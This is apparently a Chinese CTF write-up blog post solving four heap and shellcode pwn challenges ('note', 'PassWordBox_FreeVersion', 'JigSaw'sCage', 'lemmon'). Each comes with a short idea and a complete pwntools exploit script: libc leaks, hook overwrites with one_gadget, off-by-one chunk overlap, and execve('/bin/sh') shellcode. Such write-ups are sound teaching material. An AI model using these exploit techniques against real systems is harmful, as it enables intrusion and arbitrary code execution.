前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下
note:
思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce
exp:
#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./note")
libc = ELF("./libc-2.23.so")
#libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
#p = remote("47.104.70.90",25315)
elf = ELF("./note")
def add(size,content):
p.recvuntil("choice: ")
p.sendline("1")
p.sendlineafter("size: ",str(size))
p.sendlineafter("content: ",content)
p.recvuntil("addr: ")
#heap_addr = int(p.recv(6).ljust(8,"\x00"))
def show():
p.recvuntil("choice: ")
p.sendline("3")
p.recvuntil("content:")
content = p.recv()
gdb.attach(p,'$rebase 0x1235')
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline("%7$s\x00")
payload = p64(0xfbad1800) + p64(0)*3
p.sendline(payload)
raw_input()
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) -0x3c36e0
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("libc_base:"+hex(libc_base))
success("malloc_hook:"+hex(malloc_hook))
rce =0x4527a + libc_base
realloc = libc_base + libc.sym["realloc"]
realloc_hook = libc_base + libc.sym["__realloc_hook"]
payload = "%7$s\x00\x00\x00\x00"+p64(realloc_hook)
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline(payload)
raw_input()
#gdb.attach(p)
payload = p64(rce) + p64(realloc+6)
p.recvuntil("? ")
p.sendline(payload)
p.sendlineafter("choice:","1")
p.sendlineafter("size:","2")
p.interactive()
PassWordBox_FreeVersion:
这题难点就是没难点,当时找到一个加密发现加密这玩意不知道咋用,表现出了菜,后来一个re yeye告诉我这道题可以直接泄露,因为异或的是固定值,才知道了原来是这样,并且还有off-by-one,可以构造chunk overlap,泄露libc,打freehook为rce,即可
exp:
#coding:utf8
from pwn import *
sh = process('./pwdFree')
#sh = remote('47.104.71.220',38562)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(index,size,content):
sh.sendlineafter('Choice:','1')
sh.sendlineafter('Save:',str(index))
sh.sendlineafter('Pwd:',str(size))
sh.sendafter('Pwd:',content)
def edit(index,content):
sh.sendlineafter('Choice:','2')
sh.sendline(str(index))
sleep(0.5)
sh.send(content)
def show(index):
sh.sendlineafter('Choice:','3')
sh.sendlineafter('Check:',str(index))
def delete(index):
sh.sendlineafter('Choice:','4')
sh.sendlineafter('Delete:',str(index))
add(0,1,'\x00')
sh.recvuntil('Save ID:')
random = u64(sh.recv(8))
print 'cookie=',hex(random)
add(1,0xF0,'a'*0xF0) #1
add(2,0x80,'b'*0x80) #2
add(3,0x80,'c'*0x80) #3
add(4,0xF0,'d'*0xF0) #4
for i in range(5,12):
add(i,0xF0,'aaaa'*0xd0)
for i in range(5,12):
delete(i)
delete(3)
add(3,0x88,'b'*0x80 + p64((0x100 + 0x90 + 0x90) ^ random) + '\x00')
delete(1)
delete(4)
for i in range(5,12):
add(i,0xF0,'a'*0xf0)
add(1,0xF0,'a'*0xF0) #1
show(2)
sh.recvuntil('Pwd is: ')
libc_base = (u64(sh.recv(8)) ^ random) - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook_addr = libc_base + libc.sym['__free_hook']
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
onegdaget=0x4f432
delete(3)
add(3,0x98,'b'*0x80 + (p64(0 ^ random) + p64(0x91 ^ random) + p64(free_hook_addr ^ random)))
add(20,0x80,p64(0) + 'c'*0x78)
add(21,0x80,p64(onegdaget ^ random) + 'd'*0x78)
delete(11)
sh.interactive()
JigSaw'sCage :
思路:test有可执行权限,开头有长整型溢出,赋予权限,然后写shellcode。进行打即可
exp:
from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
def add(idx):
p.sendlineafter("Choice :", "1")
p.sendlineafter("Index? :", str(idx))
def show(idx):
p.sendlineafter("Choice :", "5")
p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
p.sendlineafter("Choice :", "2")
p.sendlineafter("Index? :", str(idx))
p.sendafter("iNput:", content)
def free(idx):
p.sendlineafter("Choice :", "3")
p.sendlineafter("Index? :", str(idx))
def test(idx):
p.sendlineafter("Choice :", "4")
p.sendlineafter("Index? :", str(idx))
s1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
s2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
s3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
s4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
p.sendlineafter("Name:", "max")
p.sendlineafter("Choice:", str(0xffffffff+1)) #int len overlap
add(0)
add(1)
add(2)
add(3)
edit(0,s1)
edit(1, s2)
edit(2, s3)
edit(3, s4)
test(0)
p.interactive()
lemmon:
思路:这题弄麻烦拉,用secomp开到了开启沙箱,就开始想到了打srop,然后出flag,但是看到别的队有使用edit任意写name,然后再进行栈溢出,修改最后几位为栈上flag地址(这里概率很小所以成功1/2000多吧),然后free掉,通过不断的申请,申请到flag内容输出flag,,但这是最好用的方法,但是这里我采用了srop,由于版本是在libc2.26,这里申请freehook遇到了问题,只能申请到mallochook,所以这里采用了一个大胆的想法,就是在mallochook构建一个size,绕过check,再进行不断的申请即可申请到freehook,再设置freehook为setcontext,然后在freehook布置rop,赋予权限,打即可出flag
打栈地址的exp:
from pwn import *
def add(idx, name, size, msg):
p.sendlineafter(">> ", "1")
p.sendlineafter("emon: \n", str(idx))
p.sendafter("emon: \n", name)
p.sendlineafter("emon: \n", str(size))
p.sendafter("age: \n",msg)
def edit(idx,msg):
p.sendlineafter('>>> ','4')
p.sendafter("Input the index of your lemon : \n", str(idx))
p.sendafter("Now it's your time to draw and color!\n", msg)
def free(idx):
p.sendlineafter(">>> ", "3")
p.sendlineafter("emon : \n", str(idx))
p=process('./lemon_pwn')
context.log_level = 'debug'
p.sendlineafter('me?\n','yes')
p.sendafter('number: \n','111111')
p.sendafter('first: \n','1'*0x10+p32(0x300)+'\x01')
p.recvuntil("0x")
low = int(p.recv(3),16)
print hex(low)
edit(-260, "1"*0x138+p16(low+0xe000-0x40))
add(0,"A",0x500,"a")
free(0)
add(1, "\x10", 0x10, "a")
add(0, "\x10", 0x10, "a")
add(0, "\x20", 0x500, "a")
p.interactive()
扫一扫
6047
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
